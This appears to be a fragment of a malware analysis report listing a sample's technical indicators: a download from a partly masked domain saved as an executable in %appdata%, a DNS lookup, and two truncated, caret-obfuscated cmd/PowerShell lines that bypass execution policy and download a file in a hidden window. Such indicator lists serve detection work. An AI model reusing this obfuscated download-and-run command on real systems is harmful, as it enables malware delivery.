Technical Information
- http://wi###eer.top/user.php?f=##### as %appdata%.exe
- DNS ASK wi###eer.top
- '<SYSTEM32>\cmd.exe' /c p^OW^er^shel^l^.^e^Xe ^-eXe^cut^IonpO^Lic^y b^y^Pa^Ss^ -NoP^ROfi^le ^-w^iNdow^st^YL^e^ h^i^d^deN^ ^(neW^-^oBj^e^ct ^SYstem.ne^t.We^b^c^lI^eNt^)^.d^o^WNlOadfile('http://wi#...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c p^OW^er^shel^l^.^e^Xe ^-eXe^cut^IonpO^Lic^y b^y^Pa^Ss^ -NoP^ROfi^le ^-w^iNdow^st^YL^e^ h^i^d^deN^ ^(neW^-^oBj^e^ct ^SYstem.ne^t.We^b^c^lI^eNt^)^.d^o^WNlOadfile('http://wi#...